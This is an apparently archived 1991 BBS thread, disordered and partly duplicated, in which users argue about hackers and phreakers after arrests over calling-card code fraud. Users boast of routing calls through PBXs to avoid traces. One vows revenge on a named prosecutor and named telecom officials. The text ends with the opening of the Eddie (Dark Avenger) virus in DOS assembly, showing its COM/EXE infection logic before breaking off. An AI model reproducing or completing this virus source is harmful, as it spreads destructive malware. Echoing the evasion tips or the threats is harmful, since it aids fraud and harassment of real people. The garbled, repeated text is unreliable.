  Hacking for the most part is trying to gain access to a board, with the
intention of leeching, obtain private records/files or crashing the board
itself...

  On the Other hand,  you Idea of a hacker, is really that of a Cracker...
Crackers started the BBSing world with their Internation network of pirated
software,  from HQ to Safe-Houses...  I've been in this bbs world for over 5
years and I know what goes on,  in fact I used to be with a group at one
time (Big deal, it suxed too)

  Black Boxes, Phreaking, ect:  All I can say, is uhm, well expect a cop
knocking on your door before you log off..

TWK

(The Obtainig private records and Files also includes hacking MCI codes)



50/50: hmm
Name: Full Moon #12
Date: Tue Sep 24 00:20:11 1991

yeah pirating is software, not hardware.

a bit of credit cards are for hardware...

and when i was 10 i stole this little garfield thing....
As it seems, since "The Great Purge", the message bases have dropped down in
activity.  I respectfully request that all users find the time to add a few
more posts out there.

47/50: Actually
Name: Madman #56
Date: Tue Sep 24 03:29:01 1991

RE: All I've got to say about hacking...

as long as they do not break the rules, we do not mind their presence. Freedom
to call, you don't want to read their stuff, don't, and besides, they have
helped us fill in holes to keep other's out.

ͻ
 MADMAN! 
ͼ

48/50: You are right Toad...
Name: Madman #56
Date: Tue Sep 24 03:32:09 1991

RE: bahahaha

I am not afraid of you...what is the worst you could do? Make us rebuild from
scratch? Ouch. Actually, it probably would be a blessing in disguise in some
ways...anyhow, no, I am not afraid of very much...

MADMAN

49/50: The sysops here
Name: Madman #56
Date: Tue Sep 24 03:45:32 1991

1. We will never lock anyone out because of what they claim to be or not be in
the computer world. New users, hackers, pirates, PD users, posters, squids -
all are welcome as long as they follow our rules for the board and help make
it a good place to call.

2. We will never lock out a good user - and that definition is fairly
subjective but does have guidlines. In essence, it is someone who helps keep
the board going. Someone who spots a hole and helps close it. Someone who
makes the online games a challenge for all. Someone who posts interesting and
provocative messages within the guidelines we have set (like you Bugs).
Someone who if needed, can find that program we need, or help us by making
that dam Ansi, or whatever. In short, if the person is constructive, he or she
is highly desirable to this board.

3. We believe in fair reporting - we fight for it in every case where someone
is accused of hacking or crashing a board. We want to hear ALL sides and
provide an open forum for such, and if someone tries to provide heresay as
evidence or something questionable, we will say so or delete it outright (we
do not believe that is censorship - that is editting out what a judge be say
to be inadmissable evidence or such.) As for opinions, they are always welcome
too - as long as they are expressed again within the guidelines in our rules
of what is allowed in the messages areas (no cussin and such)...

4. We - at least I do - when we find a question, such as the current one on
warrants and what they cover, and there is confusion, seek to find an answer
to post to cover it. In the case of warrants, I asked a person on another
board in the legal profession in generic terms, what a warrant covers and
all...soon as the answer comes, I will post it...

5. If any user feels this is a wrong attitude, it is their business and they
are free to not participate in the conversation. But we shall not cease to
provide an open forum.

ͻ
 MADMAN! 
ͼ



Read:(1-50,^49),? :

50/50: Thanks for including us Squids Madman!!
Name: The Grunt #20
Date: Tue Sep 24 05:13:51 1991


TSIA!
Ŀ
Ŀ


48/50: It may NOT be an NSA problem..
Name: Bluejay Bandit #183
Date: Wed Sep 25 18:23:33 1991

but why are all the people that are getting busted NSA members???  Hmmm???

I KNOW the story behind Don Moore, so thats about the only case I can honestly
say I know first hand.  Otherwise, its second hand knowledge I hear about the
others...

Also, on the issue of virii.  I think SOME Virii are pretty cool and VERY
educational.  But, the ones I do NOT support are the ones that delete data or
crash software.  Its quite a task to produce an effective virii, and quite a
challenge....

49/50: That's been my experience...
Name: Bugs #24
Date: Wed Sep 25 02:51:06 1991

RE: Hacking/Cracking

of the definition, Kid. Crackers are whizzes. Hackers are psychopaths.

With the simple touch of a key on a computer they wreak havoc on
innocent people. That to me is hardly a challenge in spite of the
crap that's been thrown on this board. Hackers are overweight hydrocephalic
idiot savants, incapable of interaction with the rest of the world.
Girlfriends? I've never known a hacker to have one. Unless of course
you count stolen Playboy centerfolds.

                                      ~~~\/BUGS

50/50: That's what I thought.
Name: Bugs #24
Date: Wed Sep 25 02:53:54 1991

RE: Actually

But who are these people that bring viruses into systems? From
everything you've said hackers are innocent lambs, who have innocent
theories and statements but never act them out. Okay.

                                    ~~~\/BUGS
44/50: Yea...
Name: Bluejay Bandit #12
Date: Mon Sep 23 21:57:54 1991

Irie Man said he took down Love Connection because he was getting hassled.
Avtually, I hear they took his WHOLE setup, including computer, desk, things
inside desk, yearbook, diplomas, etc etc.

So, no Love Connection for awhile.

SUN DEVIL II is running High.  If you have something that isnt "legal", I
suggest you hide it quick before someone comes knocking on yer door...

Do I hear FORMAT calling???

Invalid, I'll get the number for ya to ASU.

44/50: hmmm
Name: Flowers And Corndogs #19
Date: Tue Sep 24 00:46:40 1991

RE: Yea...

actually it depends whether you consider someone who got caught on their own
accord stupid or not.  lots of guys out there that havent been caught, and
they arent gonna stop cos some gov't agency is around.

45/50: The lowdown as I have pieced it together.
Name: Madman #10
Date: Tue Sep 24 01:16:11 1991

RE: hmmm

1. Love COnnection and Irie Man were NOT busted. He took his board down after
hearing what happened to Damaged and removed it for safety sake and is staying
low.

2. Toad is also staying low, as he to was not to my knowledge gone after yet.

3. Damaged had his house trashed by the cops as they went after him, he may
have released two new virii, he is on the run so to speak, and I have not
found out exactly what he is supposed to have done. Astro, thought, has
indicated that it had to with things releated to finding and using phone
numbers connected to computers - hacking type things.

4. That, in short, is it.


This is all I learned up til about 1am Tuesday morning...I am
keeping/capturing all message off Cardboard Box and other places and after
awhile will put them in order so all can see it...stay tuned for more...

MADMAN

46/50: Yeah...
Name: Two Wheel Demon #30
Date: Tue Sep 24 06:12:18 1991

RE: Yea...

I thought that he just hid everything, and nothing happened to toad?
Strange, I thought Toad was much more involved than Irie

47/50: Well...Mind Rape...
Name: Bluejay Bandit #12
Date: Wed Sep 25 14:02:35 1991

FINALLY got busted because of a lil stunt he pulled (or supposedly pulled) on
ASU's VAX.  He told someone that he was gonna take down the system with
standard user accounts.  Well, that same day, the VAX DID go down.  There is
no evidence which connects him to the VAX going down, but ASU, HONEYWELL, HP,
and the FBI figure the "brag" was sufficient evidence...

I hear they took his whole setup too....but, ASU didnt press charges.



48/50: Verify
Name: Madman #10
Date: Thu Sep 26 15:32:16 1991

RE: Well...Mind Rape...

That Mind Rape is Damaged is DIgital Phreak...if true, then I guess if what
you say is the reason he got busted is accurate, we now know a LOT more of the
story...

MADMAN



49/50: oooh
Name: Full Moon #19
Date: Thu Sep 26 16:10:57 1991

i didnt know sectorz had more than one handle.

but i never asked.  and gee, are those happy hamsters yours?



50/50: Thanx man...
Name: Goliath #57
Date: Thu Sep 26 17:00:32 1991

RE: Yea...

Shit this OSII thing is scaring the shit outta me!!

Thanx BJB... I really could use that number! eh

                                 iNVALiD MEDiA
people don't pay taxes (I'm not pointing fingers at anyone on this board, just
some people in general), yet they get at least halfway decent treatment by
others.



Read:(1-50,^7),? :1

1/50: All true.
Name: Astro #402
Date: Mon Sep 23 05:50:19 1991

RE: Seizures During Searches


    ALSO, if they find, say, computer disks, they ARE NOT allowed to use them
or even do a directory on them. Same goes for video. If the police find a
video tape of you molesting 6 year olds, that is not valid evidence for they
are not allowed to view it...



Read:(1-50,^1),? :C



2/50: !!!
Name: Astro #402
Date: Mon Sep 23 05:56:55 1991

RE: See...


    Sorry, bud, but NSA has nothing to do with this. For some reason, this is
personal...



3/50: Now
Name: Madman #56
Date: Mon Sep 23 09:32:11 1991

RE: ...

that sounds a bit much...maybe a good lawyer would be in order. I will ask a
person I know on another board about warrants and such and see what he says
and get back to you...

ͻ
 MADMAN! 
ͼ



4/50: ...
Name: Damaged #303
Date: Mon Sep 23 11:01:08 1991

RE: Oh...

hahahaha, there are 6 versions of it.  And all of them translated to C



5/50: Searched by the feds
Name: Troubled Youth #115
Date: Mon Sep 23 12:31:29 1991

RE: replies....

10 times, always for fiber samples.  Never found a match.  Don't worry, be
happy.



6/50: ...
Name: Damaged #303
Date: Mon Sep 23 15:19:23 1991

RE: All I've got to say about hacking...

This proves you ARE A FUCKING IDIOT!

One "True Hackers" do not CRASH Boards, only idiots that do that.

2!  If it WASN'T for HACKERS, you wouldn't be sitting here BBS'N!  Hackers
CREATED this world!

3.  Hackers do live a life also!  But what is wrong witha little computer
liking, Hell!  I fucking sit my compter for hours upon ends, and I still have
time for my girl, partying, talking to friends and STILL go to college (well ).

I'm sorry but you are so uninformed that, you are engaging without a life
preserver!5*



7/50: I hafta
Name: The Rush #590
Date: Mon Sep 23 18:23:44 1991

admit - I don't have any problems with hackers. I stay outa their business.

They get treated like crap, though, and that really sucks. Because a lot of
people don't pay taxes (I'm not pointing fingers at anyone on this board, just
some people in general), yet they get at least halfway decent treatment by
others.



8/50: good point
Name: Full Moon #12
Date: Mon Sep 23 18:48:22 1991

RE: ...

this little cyberspace world was created by hackers.  or didnt bugs know that?



9/50: Hacking/Cracking
Name: The Whiz Kid #78
Date: Mon Sep 23 23:36:52 1991

  Hacking for the most part is trying to gain access to a board, with the
intention of leeching, obtain private records/files or crashing the board
itself...

  On the Other hand,  you Idea of a hacker, is really that of a Cracker...
Crackers started the BBSing world with their Internation network of pirated
software,  from HQ to Safe-Houses...  I've been in this bbs world for over 5
years and I know what goes on,  in fact I used to be with a group at one
time (Big deal, it suxed too)

  Black Boxes, Phreaking, ect:  All I can say, is uhm, well expect a cop
knocking on your door before you log off..

TWK

(The Obtainig private records and Files also includes hacking MCI codes)



10/50: Actually
Name: Madman #56
Date: Tue Sep 24 03:29:01 1991

RE: All I've got to say about hacking...

as long as they do not break the rules, we do not mind their presence. Freedom
to call, you don't want to read their stuff, don't, and besides, they have
helped us fill in holes to keep other's out.

ͻ
 MADMAN! 
ͼ



11/50: The sysops here
Name: Madman #56
Date: Tue Sep 24 03:45:32 1991

1. We will never lock anyone out because of what they claim to be or not be in
the computer world. New users, hackers, pirates, PD users, posters, squids -
all are welcome as long as they follow our rules for the board and help make
it a good place to call.

2. We will never lock out a good user - and that definition is fairly
subjective but does have guidlines. In essence, it is someone who helps keep
the board going. Someone who spots a hole and helps close it. Someone who
makes the online games a challenge for all. Someone who posts interesting and
provocative messages within the guidelines we have set (like you Bugs).
Someone who if needed, can find that program we need, or help us by making
that dam Ansi, or whatever. In short, if the person is constructive, he or she
is highly desirable to this board.

3. We believe in fair reporting - we fight for it in every case where someone
is accused of hacking or crashing a board. We want to hear ALL sides and
provide an open forum for such, and if someone tries to provide heresay as
evidence or something questionable, we will say so or delete it outright (we
do not believe that is censorship - that is editting out what a judge be say
to be inadmissable evidence or such.) As for opinions, they are always welcome
too - as long as they are expressed again within the guidelines in our rules
of what is allowed in the messages areas (no cussin and such)...

4. We - at least I do - when we find a question, such as the current one on
warrants and what they cover, and there is confusion, seek to find an answer
to post to cover it. In the case of warrants, I asked a person on another
board in the legal profession in generic terms, what a warrant covers and
all...soon as the answer comes, I will post it...

5. If any user feels this is a wrong attitude, it is their business and they
are free to not participate in the conversation. But we shall not cease to
provide an open forum.

ͻ
 MADMAN! 
ͼ



12/50: It may NOT be an NSA problem..
Name: Bluejay Bandit #183
Date: Wed Sep 25 18:23:33 1991

but why are all the people that are getting busted NSA members???  Hmmm???

I KNOW the story behind Don Moore, so thats about the only case I can honestly
say I know first hand.  Otherwise, its second hand knowledge I hear about the
others...

Also, on the issue of virii.  I think SOME Virii are pretty cool and VERY
educational.  But, the ones I do NOT support are the ones that delete data or
crash software.  Its quite a task to produce an effective virii, and quite a
challenge....



13/50: That's what I thought.
Name: Bugs #24
Date: Wed Sep 25 02:53:54 1991

RE: Actually

But who are these people that bring viruses into systems? From
everything you've said hackers are innocent lambs, who have innocent
theories and statements but never act them out. Okay.

                                    ~~~\/BUGS



14/50: Hmmm... Interesting concept, this "Open Forum!"
Name: The Crazy Zonie #368
Date: Wed Sep 25 05:22:09 1991

Hehehe... (Nice title!)

Anyhow, I normally try to get the whole story before I act! (But, hey! I'm
human and had my irrational moment!) But anyways, I'd like to hear what's
going on, and for the most part, I never had much trouble from those in
question. Madman, I don't see any "Hole" in your rules! When I set up a BBS,
that will be my policy!  (Sorry that I don't play too many on-line games, but
I'm not much of a video game-aholic!)

The Craziest man to ever have an oppinion! (hehehe...)



15/50: well
Name: Full Moon #12
Date: Wed Sep 25 06:36:01 1991

it is fun to rip on  a close minded individual.



16/50: Actually in toads case
Name: Two Wheel Demon #60
Date: Wed Sep 25 11:36:40 1991

RE: Sorry to bust your bubble Toad!

wouldn't the conviction be null and void after his 18th birthday, he is a
minor now and once he becomnes an adult I don't beleive they could prosecute
him.


Well that is if he was to quite the felony before the 18th b-day


                              Tw Wh Dmn     



17/50: Actually the holes
Name: Madman #56
Date: Thu Sep 26 06:19:48 1991

RE: Hmmm... Interesting concept, this "Open Forum!"

I was referring to were backdoors and such that can crash or breach the
security of the board.

ͻ
 MADMAN! 
ͼ



18/50: That's been my experience...
Name: Bugs #24
Date: Wed Sep 25 02:51:06 1991

RE: Hacking/Cracking

of the definition, Kid. Crackers are whizzes. Hackers are psychopaths.

With the simple touch of a key on a computer they wreak havoc on
innocent people. That to me is hardly a challenge in spite of the
crap that's been thrown on this board. Hackers are overweight hydrocephalic
idiot savants, incapable of interaction with the rest of the world.
Girlfriends? I've never known a hacker to have one. Unless of course
you count stolen Playboy centerfolds.

                                      ~~~\/BUGS



19/50: Well
Name: The Whiz Kid #78
Date: Wed Sep 25 04:11:08 1991

   I have no Prob with that MadMan,  I some times don't post much as for i'm
not interested in the current subject or their isn't anything else to say that
already hasn't been said....  But then again,  once I hope in the Messages
(can take awhile for some boards)  But once into the flow..  Gulp,  a couple
new messages for the next user..

TWK



20/50: ...
Name: Astro #402
Date: Wed Sep 25 06:15:56 1991

RE: The sysops here


    I totally agree with everything, except point number 3. Madman, you KNOW
what I'm talking about, and what relavence it has to point number 3.



21/50: Letting Hackers stay on Cardboard box
Name: Two Wheel Demon #60
Date: Wed Sep 25 11:38:09 1991

RE: All I've got to say about hacking...

maybe that comes under know your enemies, but more than likely, what is wrong
with having them on here.
It isn't liek they are allowed to do their hacking here, and they really don't
talk about it here, so what is the problem with them being here, we should be
prejudicial should we?



                              Tw Wh Dmn     



22/50: What he is referring too
Name: Madman #56
Date: Thu Sep 26 06:28:56 1991

is that he takes exception with Point 3 in the way I handled his posting (and
Gaiden's) in response to a board crash at Cherry's...


ͻ
 MADMAN! 
ͼ



23/50: Sorry
Name: Madman #56
Date: Thu Sep 26 06:47:30 1991

that I got the order screwed up a bit, but go on from where we were...if
wanted, I will post a summary to date compiled from here and other sources...

ͻ
 MADMAN! 
ͼ



24/50: Open Forum sounds good.
Name: The Crazy Zonie #368
Date: Thu Sep 26 14:39:21 1991

    Well, I've never seen any problems here from the individuals in quetoin,
except maybe an occasional personality conflicts. (But hey, we all cannot be
friends. :(  )

Hmmm... So long as they kept their activities to themselfs and off the
innosent boards, they're okay. I know of one guy that I barely met through a
Hillel Service, (But i cannot remember his name!) He was just casually talking
about how viruses were so much fun! (I was talking with the NJG about her mac
class, and he overheard!) He even told me that he rewrote the system password
for a software demo computer, because the machine did not have it on the (It
as in a prog he was interested in) disk, and the sales clerk refused to give
him the password to drop to dos. (From what I understand, that was company
policy!) I don't think I want to BBS with people like that. I'm sorry, but you
just don't go changing someone's passwork, just because you don't like the
fact he won't give you access to DOS!

The Crazy ZOnie...



25/50: well
Name: Full Moon #12
Date: Thu Sep 26 17:04:39 1991

as expected, the guys who crashed omni admitted their guilt, and, as expected,
it wasnt gaiden.



26/50: Attempt at clarification...
Name: Bugs #24
Date: Thu Sep 26 18:49:02 1991

First of all, I know of NO ONE on this board who are hackers and
I don't want to. I NEVER named anyone's name because I don't KNOW
anyone's particular talents[although from some of the attacking posts
I'm not far off the mark].
I'm still in the dark as to who the kid from ASU is. I or we haven't
been told what infractions if any were committed.

I gave my opinion on hackers. I stand by it. Period. Anyone taking
my statements personally either has a thin skin or is guilty. But
no finger pointing was intended on my part.

                                         ~~~\/BUGS



27/50: no you are WRONG
Name: The Toad #68
Date: Thu Sep 26 20:39:18 1991

RE: That's what I thought.

bugs, that is because there are 2 main types of hackers 1) Good hackers, and
2) bad hackers, you are desscribing a bad hacker, a good hacker trie never to
destroy data UNLESS it is to insure his saftey. no we are NOT innocent, we
know what we do and we know that it is wrong but you must understand one thing
it has become a way of life for most,..

Also get a copy of The Arizona Republic street edition for Thursday,Sept, 25,
1991, in Secton B page B8 (very back) it discusses what is going on.



28/50: *grin*
Name: The Toad #68
Date: Thu Sep 26 20:42:58 1991

RE: Actually in toads case

well that means 4 years to wait. as of now I have no intention to stop until I
get revenge on the following people Gail Thackery (prosecuter of Sun-Devil and
prosector of Damaged), Mark Knighton, security director for LDL, and Jim
Waltman fraud manager for U S West. those are the one responsible for this.
They deserve atleast one call from me. to express my feelings.



29/50: haha bugs
Name: The Toad #68
Date: Thu Sep 26 20:46:17 1991

RE: That's been my experience...

you are barking up the wrong tree dude. you must know what a hacker can do to
sum one? It is very very nasty.
some people have recieved calls like this : "hello mr john doe?, yes this is
he., This is Blah blah from sushi under the sun, where did you say you wanted
the ton of sushi to be delivered?"



30/50: thank you.
Name: The Toad #68
Date: Thu Sep 26 20:50:28 1991

RE: Letting Hackers stay on Cardboard box

TWD, you would be surprised how much a hacker can benifit a board. ie
Security, I would do anything for R.P.X and this one, I get a call from Ron
(sysop of R.P.X) about once every 2 weeks asking me how everything is going
and to read me off al his new users, to see if I know anyof them or if they
are bad people to have on his system. Believe me I'd rather have a hacker on
my side than against me.



31/50: okay well for those who cant get a copy of the newspaper
Name: The Toad #68
Date: Thu Sep 26 21:13:38 1991

he is there article I was talking about.


Phone scam spurs raid on `hacker'
Calling-code fraud target of probe

By Fredrick Bermudez

If you own a long-distance calling card, take a good look at your next bill.
 You could be another victim of a billion-dollar electronic fraud in which
"hackers," perhaps including on in Phoenix (ONE??? I'm Insulted!!!!), make
calls at others' expense.
 Police seized computer equipment, software and a list of calling-card codes
from a north Phoenix home of a colledge student on friday as part of a
monthlong investigation.
 The 19-year-old man is one of seven people - 3 in oregon, and one each in
washington, Utah and Iowa - singled out as suspected hackers who used
computers to gain access codes, said jim Waltman, a fraud manager for U S West
communications.
 Mark Knighton, security director for LDL lond Distance, said his company and
U S west were able to trace calls to several location including the home of
the Phoenix man.
 college students are suspected of selling the codes to other students, a
common practice on campuses nationwide, Waltman said.
 It is unknown how many local customers were wrongly billed in the latest
scheme (scheme??? bahahahaha), officials said. Such fraud costs carriers and
phone companies as much as $5 billion each year, Waltman said.
 The Phoenix student who attends A S U, has not been arrested, authorities
said.
 Waltman, an expert on computer hacking (bahaha yeah right! look at one of the
notes bellow), said he was with Phoenix police (not to mention US West, FBI,
IBM, INTEL, Tymnet) on friday, when they searchedthe north Phoenix home and
uncovered what turned out to be an inexpensive and relatively simple system
for getting the codes.
 Calling cards work like this: customers are given a code of six to 14 digits
by long-distance carriers such as MCI, sprint and LDL. To make a call, a card
holder dials a local-access number, punches in the desired number and code.
The call then is billed to the card holder.
 Waltman said the student. whose name was not re-leased, programmed a home
computer to call the local number and randomly try codes. When a code worked,
the computer recorded the code.


okay well that is the article.

note: who ever wrote this article is confused, his term of hacker is actually
a "Phreaker".



32/50: I think that
Name: Road Kill #434
Date: Thu Sep 26 22:22:42 1991

    ...certain hackers could be beneficial to BBS's, like if Toad helps the
sysop patch a hole on this board.  The kind of hacking that bothers me is when
people find it amusing to destroy other people's systems, start bad viruses,
etc..  I think that everyone is innocent until proven guilty, so unless
someone isproven to have done stuff like board-crashing, they should be
allowed to stay on the board.  Accusations made against people, like the ones
between Astro and Gaiden (if I remember right) should not be considered valid
evidence.  I agree with Madman's policy, and I enjoy being an active user of
this board!
           
           Road Kill
           



33/50: Thanks Toad
Name: Madman #56
Date: Fri Sep 27 12:02:47 1991

RE: okay well for those who cant get a copy of the newspaper

BJB was incorrect, I guess, then - he was saying yesterday on Zycors or Grail
Quest that they were after him for crashing the ASU VAX. This makes ALOT more
sense...

And yes, the term should have been phreaker...anyhow, thanks for posting the
article as I missed the paper yesterday...

MADMAN



34/50: Well
Name: Madman #56
Date: Fri Sep 27 12:04:36 1991

RE: Attempt at clarification...

If you have read this far then you know what the story is...if you don't know
who is in trouble, then you weren't paying attention cause his initial post
started this all (along with Toad's).

ͻ
 MADMAN! 
ͼ



35/50: Hmmm... The State Press had that artical, but I didn't get
Name: The Crazy Zonie #368
Date: Fri Sep 27 13:53:09 1991

...to read it, cause another friend at Hillel snagged it! *SIGH!* It kinda
makes me glad that I don't have a phone card! (Don't need it!) But was that
all it was? From the sounds of it, the FEDs were trying to throw the whole set
of books at you guys. (at least that was the impression I got from the first
set of posts.) Well, I do have yesterday's paper here, so I'll read it!

The Crazy Zonie...

BTW Toad, I got your "Hi!" from Cat, and I'm saying "Hi!"



36/50: why in the hell...
Name: Bugs #24
Date: Fri Sep 27 15:06:11 1991

RE: Well

are you taking that quasi-authoritative tone with me?

That statement was for everyone. You didn't need to repsond
personally unless in email.

Get some sleep. Quickly.

                                ~~~\/BUGS
/e



37/50: barking up the wrong tree?
Name: Bugs #24
Date: Fri Sep 27 15:11:05 1991

RE: haha bugs

Are you beggining to take me personally TOAD? Do I detect a threatning
tone?

                                  ~~~\/BUGS



38/50: Why do you hack Toad?
Name: Bugs #24
Date: Fri Sep 27 15:12:59 1991

RE: no you are WRONG

Why has it become a way of life for you?

                             ~~~\/BUG



39/50: because
Name: The Toad #68
Date: Fri Sep 27 18:00:39 1991

it is a way of learning...



40/50: ...
Name: Damaged #303
Date: Sat Sep 28 00:32:08 1991

RE: Hacking/Cracking

Blah!  True Hackers do not fit the Soceity Image of a Hacker, only little
punks wanna fit that Evil Image, We are NOT evil, You must go deeper thean
that.



41/50: ...
Name: Damaged #303
Date: Sat Sep 28 00:34:19 1991

RE: That's what I thought.

I consider my Virii Development/Techology is part of Artifical Intelligence
Studies and such whats.



42/50: ...
Name: Damaged #303
Date: Sat Sep 28 00:37:30 1991

RE: That's been my experience...

I am a Hacker, I do have a girlfriend, actually you may call her my wife in
the next few months.  You may address my son as Mr. Moore thank you.

You speak of stereo types!  Hacking isn't computers!   It's a State of Mind.

Hackers can be part of society, but YOU kinds of less-informed people push us
away!  "True Hackers" do not wreak people's lives.

Only little punks that wear society image of a Hacker do.  But you see, we are
not society image.  We are much more than that.



43/50: ...
Name: Damaged #303
Date: Sat Sep 28 00:41:35 1991

RE: Attempt at clarification...

oh, that means anyone offended by saying that Blacks are stupid are guilty of
being stupid.  You fucked up.

Just because I am the one being accused doesn't mean that I'm guilty of
anything.

Just because i'm a hacker, doesn't mean that I have to HIDE my beliefs, HIDE
what I am, who i am.  Doesn't mean I have to FEEL guilty about it.  This is
what I am, and You Bugs know that (besides you already know that the college
student is me)



44/50: ...
Name: Damaged #303
Date: Sat Sep 28 00:46:51 1991

RE: barking up the wrong tree?

Of course it's a THREAT, why, YOU INSULTED you LESS-informed idiot.

nothing wrong with that, it's just when you start boasting of your SO-CALLed
knowledge



45/50: ...
Name: Damaged #303
Date: Sat Sep 28 00:47:38 1991

RE: Why do you hack Toad?

As i mentioned befored, it's a state of mind, therefore once you realize this,
it becomes dominat, for it is fun and very intellectualy satisfing



46/50: ..
Name: Astro #402
Date: Sat Sep 28 00:55:35 1991

RE: well


    Well, the one that crashed Cherry's admitted it, too. But  no one was
there to listen.....

    BTW, what you just posted was "hearsay", and NOT valid...



47/50: ???
Name: Astro #402
Date: Sat Sep 28 00:56:46 1991

RE: Attempt at clarification...


    Well, if you don't know who it is by now, you're




    FUCKING STOOOPID!



48/50: !!!
Name: Astro #402
Date: Sat Sep 28 01:00:31 1991

RE: why in the hell...


    Dude, E-Mail is for pussies (at least in your case). Just another thing to
hide in. Everytime someone says something that a "pussy" doesn't like. "Take
it to e-mail!!!". Dude, screw that. This is an open forum, and I don't like
you.



49/50: Attention...
Name: Madman #56
Date: Sat Sep 28 08:16:47 1991

Cut out the swearing...be civil. Thanks.

ͻ
 MADMAN! 
ͼ



50/50: Hacking
Name: The Whiz Kid #78
Date: Sun Sep 29 01:13:05 1991

   You have your terms mixed up...    (their is no such thing as a true
41/50: When I say "hacker"
Name: Road Kill #434
Date: Sun Sep 29 04:38:34 1991

    ...I am mainly referring to those that are very computer literate.  I try
not to imply any good or bad.  I am not aware of what the differences are
between hacking, cracking, phreaking, etc., so I use hacker as a general term.
           
           Road Kill
           


41/50: When I say "hacker"
Name: Road Kill #434
Date: Sun Sep 29 04:38:34 1991

    ...I am mainly referring to those that are very computer literate.  I try
not to imply any good or bad.  I am not aware of what the differences are
between hacking, cracking, phreaking, etc., so I use hacker as a general term.
           
           Road Kill
           




42/50: yes.
Name: The Toad #68
Date: Sun Sep 29 09:32:44 1991

RE: Hacking

I could if I wished to do so, I have user list editors for wwiv and telegard..
I could give my own account 255 - 255 and they would never know it. BUT I
would NOT use it on this machine (cardboard box). also I dont like spending my
time on hacking into boards, Internet is what I love, any one can phreak with
very little knowledge bu hacking is the fun stuff.



43/50: So Damaged! What are they going to do to you??
Name: Cardinal #97
Date: Sun Sep 29 09:58:40 1991

The article in State Press said no charges had yet been filed..Is this true?
Do you think they will file charges against you? What about ASU do you think
you'll still be a student there when this is over? I hear there student
ethics(?) committee is really tough on students who give ASU a black eye in
the press....

Another question I have is Why did you do it? Was it the thrill of beating the
system or was it just to be a chaepskate and ripoff other people??

I'm not trying to be offensive here, I'm trying to understand the motivation
involved in committing an illegal action. Makes a great topic for a research
paper...


Cardinal



44/50: It's obvious.
Name: Batz! #266
Date: Sun Sep 29 12:40:00 1991

Toad and Damaged, it's obvious that most everyone here will never understand
the thrill of hacking, nor the true reasons behind it.
Batz!~



45/50: Wasnt it Mind Rape...
Name: Bluejay Bandit #183
Date: Sun Sep 29 15:28:20 1991

that was highlighted in The State Press Newsletter? That US West scam?



46/50: Info, please...
Name: Steve #136
Date: Sun Sep 29 16:07:37 1991

Has anyone ever heard of group or individual that goes by the handle "Zarcon
3" ?  I came into posseession of a file that only displays a message about
"Zarcon 3" striking again.  In fact, the file has an extension of ".Z-3".

I scanned it and found nothing (though I understand that isn't fool proof).

Any info would be appreciated.



47/50: hmmm
Name: Full Moon #12
Date: Sun Sep 29 17:47:39 1991

RE: Hacking

someone has there own terms mixed up  in an effort to elaborate them.
Cracker (thats a damn stupid word) is not a pirate.  fif you crack something,
maybe its because you want to make a bloody backup without paying 50 extra
bucks. thats perfectly legal.  pirate and hacker are different as well, as are
hacker and phreaker.  although many tend to fit all categories, they are
different, even though the media doesnt make such distinctions, because Joe
Average doesnt know the difference, and they are just trying to get the story
across.



48/50: but.
Name: The Toad #68
Date: Sun Sep 29 18:46:50 1991

RE: hmmm

A hacker has most phreaker skills, yuo cannot hack on a system calling direct
for they will trace you, so you ue phreaking skills and use a extender, pbx,
diverter to call through then they trace the # back to the pbx etc. then they
call that company more or less the pbx company will not wanna get
invlovled.... And yes most of the "hacker experts" have never hacked in there
lives, they only read bout us and study us trying to figure us out, our
motives, our lifestyles etc... as for what you said cardnal my motives are
simple, 1) the trill of beating the system 2) for fun. 3) to learn and to know
more than the average computer user. thats about as simple as i can put it.
like i have said before hacking has become a way of life. A way of life I have
FULL control of..



49/50:
Name: Full Moon #12
Date: Sun Sep 29 21:55:50 1991

well, if, damaged, you did what is alleged, than your rational for hacking is
invalid.  not to say the allegations are true, but if you did sell codes to
other students, than that is damaging and voids your perspective on the whole
deal.  but i for one don't know what you did and i don't make overzealous
conclusions either.  its just an observation.



50/50: Hmmm...
Name: The Crazy Zonie #368
Date: Sun Sep 29 23:58:46 1991

Well, I'm NOT a hacker, and I'm  just strugling on just learning the
tempermental things! So, here is one avarage user that you're knowledge is
superiour... hehehe... Maybe it's just that I don't see much need to break
into any system. (Could it be that I'm happy just coexisting in this computer
world? Scary thought!!!) But what's really interesting iis watching the Non
computer literate people (And MOST Mac Users!) that I BUILT my own computer!
hehehe... They think you have to be some supergenious to just plus crds and
copy files! Geese... Now that's real funny!

Here's something I think you all will enjoy!

Question:
    How many Feds does it take to change a light bulb?

Answer:
    Two; One to tell you that the siituation is under control, and the other
to scew the bulb into the kitchen fauset!

The Crazy ZOnie...


_____________________________________________________________________________
Phile 6 :
;************************
;*			*
;*	E D D I E	*
;*			*
;*   by  Dark Avenger	*
;*			*
;*	3-JAN-1989	*
;*			*
;*     version 1.31x	*
;*			*
;************************


; "Blessed is he who expects nothing, for he shall not be disappointed."

;             .  
;    ,       ,    
;        ,      
;    (        ,  
;  ).         1  
;     .      
;   ,        
;     .       
;  ,          !  
; ,             
;     (..	 ).	
; ,     .COM     
; .          3 , 
;   0e9h, 68h, 0       .  
;      JMP    .


;   :         
;   ,      
;        .      
;      .

;               
;  .   ,       
; ,   ,       
;  ,        (   
; C      ).
;      !

code	segment
	assume	cs:code,ds:code
copyright:
	db	'Eddie lives...somewhere in time!',0
date_stamp:
	dd	12239000h
checksum:
	db	30

;     .EXE :
;  DS=ES=PSP,  SS:SP  CS:IP.

exit_exe:
	mov	bx,es
	add	bx,10h
	add	bx,word ptr cs:[si+call_adr+2]
	mov	word ptr cs:[si+patch+2],bx
	mov	bx,word ptr cs:[si+call_adr]
	mov	word ptr cs:[si+patch],bx
	mov	bx,es
	add	bx,10h
	add	bx,word ptr cs:[si+stack_pointer+2]
	mov	ss,bx
	mov	sp,word ptr cs:[si+stack_pointer]
	db	0eah			;JMP XXXX:YYYY
patch:
	dd	0

;     .COM :
;  3-     ,  SP  IP.

exit_com:
	mov	di,100h
	add	si,offset my_save
	movsb
	movsw
	mov	sp,ds:[6]		;  
	xor	bx,bx
	push	bx
	jmp	[si-11] 		;si+call_adr-top_file

;    .

startup:
	call	relative
relative:
	pop	si			;SI = $
	sub	si,offset relative
	cld
	cmp	word ptr cs:[si+my_save],5a4dh
	je	exe_ok
	cli
	mov	sp,si			; .COM    
	add	sp,offset top_file+100h ;,      
	sti				; 
	cmp	sp,ds:[6]
	jnc	exit_com
exe_ok:
	push	ax
	push	es
	push	si
	push	ds
	mov	di,si

;     INT 13h  ROM-BIOS

